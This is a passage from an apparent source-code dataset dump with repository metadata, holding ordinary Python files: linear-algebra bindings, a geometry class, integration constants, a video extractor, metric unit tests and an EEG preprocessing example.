lib.ElLeftReflectorDist_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
def LeftReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElLeftReflector_s(*args)
elif x.tag == dTag: lib.ElLeftReflector_d(*args)
elif x.tag == cTag: lib.ElLeftReflector_c(*args)
elif x.tag == zTag: lib.ElLeftReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElLeftReflectorDist_s(*args)
elif x.tag == dTag: lib.ElLeftReflectorDist_d(*args)
elif x.tag == cTag: lib.ElLeftReflectorDist_c(*args)
elif x.tag == zTag: lib.ElLeftReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
# Right application
# -----------------
lib.ElRightReflector_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightReflector_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightReflector_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightReflector_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
lib.ElRightReflectorDist_s.argtypes = [POINTER(sType),c_void_p,POINTER(sType)]
lib.ElRightReflectorDist_d.argtypes = [POINTER(dType),c_void_p,POINTER(dType)]
lib.ElRightReflectorDist_c.argtypes = [POINTER(cType),c_void_p,POINTER(cType)]
lib.ElRightReflectorDist_z.argtypes = [POINTER(zType),c_void_p,POINTER(zType)]
def RightReflector(chi,x):
alpha = TagToType(x.tag)(chi)
tau = TagToType(x.tag)()
args = [pointer(alpha),x.obj,pointer(tau)]
if type(x) is Matrix:
if x.tag == sTag: lib.ElRightReflector_s(*args)
elif x.tag == dTag: lib.ElRightReflector_d(*args)
elif x.tag == cTag: lib.ElRightReflector_c(*args)
elif x.tag == zTag: lib.ElRightReflector_z(*args)
else: DataExcept()
elif type(x) is DistMatrix:
if x.tag == sTag: lib.ElRightReflectorDist_s(*args)
elif x.tag == dTag: lib.ElRightReflectorDist_d(*args)
elif x.tag == cTag: lib.ElRightReflectorDist_c(*args)
elif x.tag == zTag: lib.ElRightReflectorDist_z(*args)
else: DataExcept()
else: TypeExcept()
return alpha, tau
| 42.834123
| 78
| 0.731356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 727
| 0.080438
|
3bf87ad7597d41df2c5bff20fab72d6e34dbefa1
| 2,443
|
py
|
Python
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 41
|
2021-11-24T05:54:08.000Z
|
2022-03-26T10:19:30.000Z
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 1
|
2022-02-28T04:34:51.000Z
|
2022-03-07T10:49:27.000Z
|
src/PointClasses/Bisector.py
|
Lovely-XPP/tkzgeom
|
bf68e139dc05f759542d6611f4dc07f4f2727b92
|
[
"MIT"
] | 10
|
2021-11-24T07:35:17.000Z
|
2022-03-25T18:42:14.000Z
|
from Point import Point
import Constant as c
from GeometryMath import bisector_point
class Bisector(Point):
def __init__(self, item):
"""Construct Bisector."""
Point.__init__(self, item)
self.item["sub_type"] = c.Point.Definition.BISECTOR
def tikzify(self):
return '\\tkzDefLine[bisector](%s,%s,%s)\\tkzGetPoint{%s}' % (self.item["definition"]["A"],
self.item["definition"]["B"],
self.item["definition"]["C"],
self.get_id())
def recompute_canvas(self, items, window, width, height):
A = items[self.depends_on()[0]].get_canvas_coordinates()
B = items[self.depends_on()[1]].get_canvas_coordinates()
C = items[self.depends_on()[2]].get_canvas_coordinates()
self.set_canvas_coordinates(*bisector_point(A, B, C))
def __str__(self):
return "Bisector point (%s) of angle %s"\
% (self.item["id"], self.item["definition"]["A"]+self.item["definition"]["B"]+self.item["definition"]["C"])
def definition_builder(self, data, items=None):
if len(data) == 3:
return dict(zip(["A", "B", "C"], data))
def parse_into_definition(self, arguments, items):
# arguments length condition
if len(arguments) != 3:
return None
# all arguments are members of the regular expression for argument name
if not all(map(lambda x: self.name_pattern(x), arguments)):
return None
# all arguments are items that already exist
if not all(map(lambda x: x in items, arguments)):
return None
# the type of all arguments is of a certain type
if not all(map(lambda x: items[x].item["type"] == 'point', arguments)):
return None
# self-reference condition (self-reference is not permitted)
if self.get_id() in arguments:
return None
# condition for cross reference
for id in arguments:
deep_depends = items[id].deep_depends_on(items)
if self.get_id() in deep_depends:
return None
return self.definition_builder(arguments)
@staticmethod
def static_patterns():
return ["ppp"]
def patterns(self):
return ["ppp"]
| 40.04918
| 119
| 0.56447
| 2,355
| 0.963979
| 0
| 0
| 63
| 0.025788
| 0
| 0
| 527
| 0.215718
|
3bf883b35e2fe868219f30a0db3d466b114010f3
| 354
|
py
|
Python
|
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | 3
|
2022-03-02T07:49:47.000Z
|
2022-03-18T08:59:05.000Z
|
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | null | null | null |
custom_components/fitx/const.py
|
Raukze/home-assistant-fitx
|
2808200e0e87a0559b927dc013765bf1cd20030e
|
[
"MIT"
] | null | null | null |
DOMAIN = "fitx"
ICON = "mdi:weight-lifter"
CONF_LOCATIONS = 'locations'
CONF_ID = 'id'
ATTR_ADDRESS = "address"
ATTR_STUDIO_NAME = "studioName"
ATTR_ID = CONF_ID
ATTR_URL = "url"
DEFAULT_ENDPOINT = "https://www.fitx.de/fitnessstudios/{id}"
REQUEST_METHOD = "GET"
REQUEST_AUTH = None
REQUEST_HEADERS = None
REQUEST_PAYLOAD = None
REQUEST_VERIFY_SSL = True
| 25.285714
| 60
| 0.762712
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 112
| 0.316384
|
3bf93c870b2bc30c3baf9567a64d06171558f06b
| 1,894
|
py
|
Python
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2016-04-25T16:26:07.000Z
|
2021-04-28T16:10:29.000Z
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2016-04-22T01:33:31.000Z
|
2016-08-04T15:33:19.000Z
|
youtube_dl/extractor/scivee.py
|
Logmytech/youtube-dl-QT
|
1497297719a95c4f70fbfa32e0fa4e38cdd475dc
|
[
"MIT"
] | 5
|
2020-10-25T09:18:58.000Z
|
2021-05-23T22:57:55.000Z
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import int_or_none
class SciVeeIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?scivee\.tv/node/(?P<id>\d+)'
_TEST = {
'url': 'http://www.scivee.tv/node/62352',
'md5': 'b16699b74c9e6a120f6772a44960304f',
'info_dict': {
'id': '62352',
'ext': 'mp4',
'title': 'Adam Arkin at the 2014 DOE JGI Genomics of Energy & Environment Meeting',
'description': 'md5:81f1710638e11a481358fab1b11059d7',
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
# annotations XML is malformed
annotations = self._download_webpage(
'http://www.scivee.tv/assets/annotations/%s' % video_id, video_id, 'Downloading annotations')
title = self._html_search_regex(r'<title>([^<]+)</title>', annotations, 'title')
description = self._html_search_regex(r'<abstract>([^<]+)</abstract>', annotations, 'abstract', fatal=False)
filesize = int_or_none(self._html_search_regex(
r'<filesize>([^<]+)</filesize>', annotations, 'filesize', fatal=False))
formats = [
{
'url': 'http://www.scivee.tv/assets/audio/%s' % video_id,
'ext': 'mp3',
'format_id': 'audio',
},
{
'url': 'http://www.scivee.tv/assets/video/%s' % video_id,
'ext': 'mp4',
'format_id': 'video',
'filesize': filesize,
},
]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': 'http://www.scivee.tv/assets/videothumb/%s' % video_id,
'formats': formats,
}
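# --- Illustrative sketch (not part of the original extractor) ---
# Shows how the `_VALID_URL` pattern above captures the numeric node id.
def _scivee_id_example(url='http://www.scivee.tv/node/62352'):
    mobj = re.match(SciVeeIE._VALID_URL, url)
    return mobj.group('id')  # -> '62352'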
| 33.22807
| 116
| 0.541711
| 1,773
| 0.936114
| 0
| 0
| 0
| 0
| 0
| 0
| 745
| 0.393347
|
3bfa7757212343833fdcee31409e1364ca82a73d
| 11,790
|
py
|
Python
|
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
examples/plot_tuh_eeg_corpus.py
|
SciMK/braindecode
|
65b8de3e8a542e299996c0917ea3383aea5a9a69
|
[
"BSD-3-Clause"
] | null | null | null |
"""Process a big data EEG resource (TUH EEG Corpus)
===================================================
In this example, we showcase usage of the Temple University Hospital EEG Corpus
(https://www.isip.piconepress.com/projects/tuh_eeg/html/downloads.shtml#c_tueg)
including simple preprocessing steps as well as cutting of compute windows.
"""
# Author: Lukas Gemein <l.gemein@gmail.com>
#
# License: BSD (3-clause)
import os
import tempfile
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('seaborn')
import mne
from braindecode.datasets import TUH
from braindecode.preprocessing import preprocess, Preprocessor, create_fixed_length_windows
from braindecode.datautil.serialization import load_concat_dataset
mne.set_log_level('ERROR') # avoid messages every time a window is extracted
###############################################################################
# If you want to try this code with the actual data, please delete the next
# section. We are required to mock some dataset functionality, since the data
# is not available at creation time of this example.
from unittest import mock
FAKE_PATHS = {
'tuh_eeg/v1.1.0/edf/01_tcp_ar/000/00000000/s001_2015_12_30/00000000_s001_t000.edf': b'0 00000000 M 01-JAN-1978 00000000 Age:37 ', # noqa E501
'tuh_eeg/v1.1.0/edf/02_tcp_le/000/00000058/s001_2003_02_05/00000058_s001_t000.edf': b'0 00000058 M 01-JAN-2003 00000058 Age:0.0109 ', # noqa E501
'tuh_eeg/v1.2.0/edf/03_tcp_ar_a/149/00014928/s004_2016_01_15/00014928_s004_t007.edf': b'0 00014928 F 01-JAN-1933 00014928 Age:83 ', # noqa E501
}
def _fake_raw(*args, **kwargs):
sfreq = 10
ch_names = [
'EEG A1-REF', 'EEG A2-REF',
'EEG FP1-REF', 'EEG FP2-REF', 'EEG F3-REF', 'EEG F4-REF', 'EEG C3-REF',
'EEG C4-REF', 'EEG P3-REF', 'EEG P4-REF', 'EEG O1-REF', 'EEG O2-REF',
'EEG F7-REF', 'EEG F8-REF', 'EEG T3-REF', 'EEG T4-REF', 'EEG T5-REF',
'EEG T6-REF', 'EEG FZ-REF', 'EEG CZ-REF', 'EEG PZ-REF']
duration_min = 6
data = np.random.randn(len(ch_names), duration_min*sfreq*60)
info = mne.create_info(ch_names=ch_names, sfreq=sfreq, ch_types='eeg')
raw = mne.io.RawArray(data=data, info=info)
return raw
def _get_header(*args):
return FAKE_PATHS[args[0]]
@mock.patch('glob.glob', return_value=FAKE_PATHS.keys())
@mock.patch('mne.io.read_raw_edf', new=_fake_raw)
@mock.patch('braindecode.datasets.tuh._read_edf_header', new=_get_header)
def mock_get_data(mock_glob):
tuh = TUH(
path='',
recording_ids=None,
target_name=None,
preload=False,
add_physician_reports=False,
)
return tuh
tuh = mock_get_data()
###############################################################################
# We start by creating a TUH dataset. First, the class generates a description
# of the recordings in `TUH_PATH` (which is later accessible as
# `tuh.description`) without actually touching the files. This will parse
# information from file paths such as patient id, recording date, etc. and should
# be really fast. Afterwards, the files are sorted chronologically by year,
# month, day, patient id, recording session and segment.
# In the following, a subset of the description corresponding to `recording_ids`
# is used.
# Afterwards, the files will be iterated a second time, slower than before.
# The files are now actually touched. Additional information about subjects
# like age and gender are parsed directly from the EDF file header. If existent,
# the physician report is added to the description. Furthermore, the recordings
# are read with `mne.io.read_raw_edf` with `preload=False`. Finally, we will get
# a `BaseConcatDataset` of `BaseDatasets` each holding a single
# `mne.io.Raw` which is fully compatible with other braindecode functionalities.
# Uncomment the lines below to actually run this code on real data.
# tuh = TUH(
# path=<TUH_PATH>, # please insert actual path to data here
# recording_ids=None,
# target_name=None,
# preload=False,
# add_physician_reports=False,
# )
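###############################################################################
# As a quick illustration (using the mocked `tuh` object created above), the
# recording metadata parsed in the previous step is exposed as a pandas
# DataFrame and can be inspected directly, e.g.:
print(tuh.description.head())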
###############################################################################
# We can easily create descriptive statistics using the description `DataFrame`,
# for example an age histogram split by gender of patients.
fig, ax = plt.subplots(1, 1, figsize=(15, 5))
genders = tuh.description.gender.unique()
x = [tuh.description.age[tuh.description.gender == g] for g in genders]
ax.hist(
x=x,
stacked=True,
bins=np.arange(100, dtype=int),
alpha=.5,
)
ax.legend(genders)
ax.set_xlabel('Age [years]')
ax.set_ylabel('Count')
###############################################################################
# Next, we will perform some preprocessing steps. First, we will do some
# selection of available recordings based on the duration. We will select those
# recordings, that have at least five minutes duration. Data is not loaded here.
def select_by_duration(ds, tmin=0, tmax=None):
# determine length of the recordings and select based on tmin and tmax
duration = ds.description.n_samples / ds.description.sfreq
duration = duration[duration >= tmin]
if tmax is None:
tmax = np.inf
duration = duration[duration <= tmax]
split_ids = list(duration.index)
splits = ds.split(split_ids)
split = splits['0']
return split
tmin = 5 * 60
tmax = None
tuh = select_by_duration(tuh, tmin, tmax)
###############################################################################
# Next, we will discard all recordings that have an incomplete channel
# configuration (wrt the channels that we are interested in, i.e. the 21
# channels of the international 10-20-placement). The dataset is subdivided into
# recordings with 'le' and 'ar' reference which we will have to consider. Data
# is not loaded here.
short_ch_names = sorted([
'A1', 'A2',
'FP1', 'FP2', 'F3', 'F4', 'C3', 'C4', 'P3', 'P4', 'O1', 'O2',
'F7', 'F8', 'T3', 'T4', 'T5', 'T6', 'FZ', 'CZ', 'PZ'])
ar_ch_names = sorted([
'EEG A1-REF', 'EEG A2-REF',
'EEG FP1-REF', 'EEG FP2-REF', 'EEG F3-REF', 'EEG F4-REF', 'EEG C3-REF',
'EEG C4-REF', 'EEG P3-REF', 'EEG P4-REF', 'EEG O1-REF', 'EEG O2-REF',
'EEG F7-REF', 'EEG F8-REF', 'EEG T3-REF', 'EEG T4-REF', 'EEG T5-REF',
'EEG T6-REF', 'EEG FZ-REF', 'EEG CZ-REF', 'EEG PZ-REF'])
le_ch_names = sorted([
'EEG A1-LE', 'EEG A2-LE',
'EEG FP1-LE', 'EEG FP2-LE', 'EEG F3-LE', 'EEG F4-LE', 'EEG C3-LE',
'EEG C4-LE', 'EEG P3-LE', 'EEG P4-LE', 'EEG O1-LE', 'EEG O2-LE',
'EEG F7-LE', 'EEG F8-LE', 'EEG T3-LE', 'EEG T4-LE', 'EEG T5-LE',
'EEG T6-LE', 'EEG FZ-LE', 'EEG CZ-LE', 'EEG PZ-LE'])
assert len(short_ch_names) == len(ar_ch_names) == len(le_ch_names)
ar_ch_mapping = {ch_name: short_ch_name for ch_name, short_ch_name in zip(
ar_ch_names, short_ch_names)}
le_ch_mapping = {ch_name: short_ch_name for ch_name, short_ch_name in zip(
le_ch_names, short_ch_names)}
ch_mapping = {'ar': ar_ch_mapping, 'le': le_ch_mapping}
def select_by_channels(ds, ch_mapping):
split_ids = []
for i, d in enumerate(ds.datasets):
# these are the channels we are looking for
seta = set(ch_mapping[d.description.reference].keys())
# these are the channels of the recording
setb = set(d.raw.ch_names)
# if recording contains all channels we are looking for, include it
if seta.issubset(setb):
split_ids.append(i)
return ds.split(split_ids)['0']
tuh = select_by_channels(tuh, ch_mapping)
###############################################################################
# Next, we will chain several preprocessing steps that are realized through
# `mne`. Data will be loaded by the first preprocessor that has a mention of it
# in brackets:
#
# #. crop the recordings to a region of interest
# #. re-reference all recordings to 'ar' (requires load)
# #. rename channels to short channel names
# #. pick channels of interest
# #. scale signals to microvolts (requires load)
# #. resample recordings to a common frequency (requires load)
# #. create compute windows
def custom_rename_channels(raw, mapping):
# rename channels which are dependent on referencing:
# le: EEG 01-LE, ar: EEG 01-REF
# mne fails if the mapping contains channels as keys that are not present
# in the raw
reference = raw.ch_names[0].split('-')[-1].lower()
assert reference in ['le', 'ref'], 'unexpected referencing'
reference = 'le' if reference == 'le' else 'ar'
raw.rename_channels(mapping[reference])
def custom_crop(raw, tmin=0.0, tmax=None, include_tmax=True):
# crop recordings to tmin – tmax. can be incomplete if recording
# has lower duration than tmax
# by default mne fails if tmax is bigger than duration
tmax = min((raw.n_times - 1) / raw.info['sfreq'], tmax)
raw.crop(tmin=tmin, tmax=tmax, include_tmax=include_tmax)
tmin = 1 * 60
tmax = 6 * 60
sfreq = 100
preprocessors = [
Preprocessor(custom_crop, tmin=tmin, tmax=tmax, include_tmax=False,
apply_on_array=False),
Preprocessor('set_eeg_reference', ref_channels='average', ch_type='eeg'),
Preprocessor(custom_rename_channels, mapping=ch_mapping,
apply_on_array=False),
Preprocessor('pick_channels', ch_names=short_ch_names, ordered=True),
Preprocessor(lambda x: x * 1e6),
Preprocessor('resample', sfreq=sfreq),
]
###############################################################################
# The preprocessing loop works as follows. For every recording, we apply the
# preprocessors as defined above. Then, we update the description of the rec,
# since we have altered the duration, the reference, and the sampling
# frequency. Afterwards, we store each recording to a unique subdirectory that
# is named corresponding to the rec id. To save memory we delete the raw
# dataset after storing. This gives us the option to try different windowing
# parameters after reloading the data.
OUT_PATH = tempfile.mkdtemp() # please insert actual output directory here
tuh_splits = tuh.split([[i] for i in range(len(tuh.datasets))])
for rec_i, tuh_subset in tuh_splits.items():
preprocess(tuh_subset, preprocessors)
# update description of the recording(s)
tuh_subset.set_description({
'sfreq': len(tuh_subset.datasets) * [sfreq],
'reference': len(tuh_subset.datasets) * ['ar'],
'n_samples': [len(d) for d in tuh_subset.datasets],
}, overwrite=True)
# create one directory for every recording
rec_path = os.path.join(OUT_PATH, str(rec_i))
if not os.path.exists(rec_path):
os.makedirs(rec_path)
tuh_subset.save(rec_path)
# save memory by deleting raw recording
del tuh_subset.datasets[0].raw
###############################################################################
# We reload the preprocessed data again in a lazy fashion (`preload=False`).
tuh_loaded = load_concat_dataset(OUT_PATH, preload=False)
###############################################################################
# We generate compute windows. The resulting dataset is now ready to be used
# for model training.
window_size_samples = 1000
window_stride_samples = 1000
# generate compute windows here and store them to disk
tuh_windows = create_fixed_length_windows(
tuh_loaded,
start_offset_samples=0,
stop_offset_samples=None,
window_size_samples=window_size_samples,
window_stride_samples=window_stride_samples,
drop_last_window=False
)
# store the number of windows required for loading later on
tuh_windows.set_description({
"n_windows": [len(d) for d in tuh_windows.datasets]})
| 39.966102
| 195
| 0.653605
| 0
| 0
| 0
| 0
| 377
| 0.031971
| 0
| 0
| 6,991
| 0.59286
|
3bfae0d38025f9ed469b1477352c2cbb4d204cae
| 9,752
|
py
|
Python
|
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
import logging
import numpy as np
from emmental.metrics.accuracy import accuracy_scorer
from emmental.metrics.accuracy_f1 import accuracy_f1_scorer
from emmental.metrics.fbeta import f1_scorer, fbeta_scorer
from emmental.metrics.matthews_correlation import (
matthews_correlation_coefficient_scorer,
)
from emmental.metrics.mean_squared_error import mean_squared_error_scorer
from emmental.metrics.pearson_correlation import pearson_correlation_scorer
from emmental.metrics.pearson_spearman import pearson_spearman_scorer
from emmental.metrics.precision import precision_scorer
from emmental.metrics.recall import recall_scorer
from emmental.metrics.roc_auc import roc_auc_scorer
from emmental.metrics.spearman_correlation import spearman_correlation_scorer
from tests.utils import isequal
def test_accuracy(caplog):
"""Unit test of accuracy_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
probs = np.array(
[[0.9, 0.1], [0.6, 0.4], [1.0, 0.0], [0.8, 0.2], [0.6, 0.4], [0.05, 0.95]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = accuracy_scorer(golds, None, preds)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(golds, probs, None)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(golds, probs, preds, topk=2)
assert isequal(metric_dict, {"accuracy@2": 1.0})
metric_dict = accuracy_scorer(gold_probs, None, preds)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(gold_probs, probs, preds, topk=2)
assert isequal(metric_dict, {"accuracy@2": 1.0})
metric_dict = accuracy_scorer(golds, None, preds, normalize=False)
assert isequal(metric_dict, {"accuracy": 4})
metric_dict = accuracy_scorer(gold_probs, probs, preds, topk=2, normalize=False)
assert isequal(metric_dict, {"accuracy@2": 6})
def test_precision(caplog):
"""Unit test of precision_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = precision_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"precision": 1})
metric_dict = precision_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"precision": 0.6})
metric_dict = precision_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"precision": 1})
metric_dict = precision_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"precision": 0.6})
def test_recall(caplog):
"""Unit test of recall_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = recall_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"recall": 0.3333333333333333})
metric_dict = recall_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"recall": 1})
metric_dict = recall_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"recall": 0.3333333333333333})
metric_dict = recall_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"recall": 1})
def test_f1(caplog):
"""Unit test of f1_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = f1_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"f1": 0.5})
metric_dict = f1_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"f1": 0.7499999999999999})
metric_dict = f1_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"f1": 0.5})
metric_dict = f1_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"f1": 0.7499999999999999})
def test_fbeta(caplog):
"""Unit test of fbeta_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = fbeta_scorer(golds, None, preds, pos_label=1, beta=2)
assert isequal(metric_dict, {"f2": 0.3846153846153846})
metric_dict = fbeta_scorer(golds, None, preds, pos_label=0, beta=2)
assert isequal(metric_dict, {"f2": 0.8823529411764706})
metric_dict = fbeta_scorer(gold_probs, None, preds, pos_label=1, beta=2)
assert isequal(metric_dict, {"f2": 0.3846153846153846})
metric_dict = fbeta_scorer(gold_probs, None, preds, pos_label=0, beta=2)
assert isequal(metric_dict, {"f2": 0.8823529411764706})
def test_matthews_corrcoef(caplog):
"""Unit test of matthews_correlation_coefficient_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = matthews_correlation_coefficient_scorer(golds, None, preds)
assert isequal(metric_dict, {"matthews_corrcoef": 0.4472135954999579})
def test_mean_squared_error(caplog):
"""Unit test of mean_squared_error_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([3, -0.5, 2, 7])
probs = np.array([2.5, 0.0, 2, 8])
metric_dict = mean_squared_error_scorer(golds, probs, None)
assert isequal(metric_dict, {"mean_squared_error": 0.375})
golds = np.array([[0.5, 1], [-1, 1], [7, -6]])
probs = np.array([[0, 2], [-1, 2], [8, -5]])
metric_dict = mean_squared_error_scorer(golds, probs, None)
assert isequal(metric_dict, {"mean_squared_error": 0.7083333333333334})
def test_pearson_correlation(caplog):
"""Unit test of pearson_correlation_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = pearson_correlation_scorer(golds, probs, None)
assert isequal(metric_dict, {"pearson_correlation": 0.6764814252025461})
metric_dict = pearson_correlation_scorer(golds, probs, None, return_pvalue=True)
assert isequal(
metric_dict,
{
"pearson_correlation": 0.6764814252025461,
"pearson_pvalue": 0.14006598491201777,
},
)
def test_spearman_correlation(caplog):
"""Unit test of spearman_correlation_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = spearman_correlation_scorer(golds, probs, None)
assert isequal(metric_dict, {"spearman_correlation": 0.7921180343813395})
metric_dict = spearman_correlation_scorer(golds, probs, None, return_pvalue=True)
assert isequal(
metric_dict,
{
"spearman_correlation": 0.7921180343813395,
"spearman_pvalue": 0.06033056705743058,
},
)
def test_pearson_spearman(caplog):
"""Unit test of pearson_spearman_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = pearson_spearman_scorer(golds, probs, None)
assert isequal(metric_dict, {"pearson_spearman": 0.7342997297919428})
def test_roc_auc(caplog):
"""Unit test of roc_auc_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([[1], [0], [1], [0], [1], [0]])
gold_probs = np.array(
[[0.4, 0.6], [0.9, 0.1], [0.3, 0.7], [0.8, 0.2], [0.1, 0.9], [0.6, 0.4]]
)
probs = np.array(
[[0.2, 0.8], [0.4, 0.6], [0.1, 0.9], [0.3, 0.7], [0.3, 0.7], [0.8, 0.2]]
)
preds = np.array([[0.8], [0.6], [0.9], [0.7], [0.7], [0.2]])
metric_dict = roc_auc_scorer(golds, probs, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(gold_probs, probs, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(golds, preds, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(gold_probs, preds, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
golds = np.array([1, 1, 1, 1, 1, 1])
metric_dict = roc_auc_scorer(golds, probs, None)
assert isequal(metric_dict, {"roc_auc": float("nan")})
def test_accuracy_f1(caplog):
"""Unit test of accuracy_f1_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = accuracy_f1_scorer(golds, None, preds)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
metric_dict = accuracy_f1_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
metric_dict = accuracy_f1_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"accuracy_f1": 0.7083333333333333})
metric_dict = accuracy_f1_scorer(gold_probs, None, preds)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
| 31.869281
| 85
| 0.658839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 947
| 0.097108
|
3bfbc45da374cdb7d8360321c18d5a979fdef4e1
| 3,986
|
py
|
Python
|
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | null | null | null |
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | 1
|
2015-01-12T12:41:29.000Z
|
2015-01-12T12:41:29.000Z
|
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
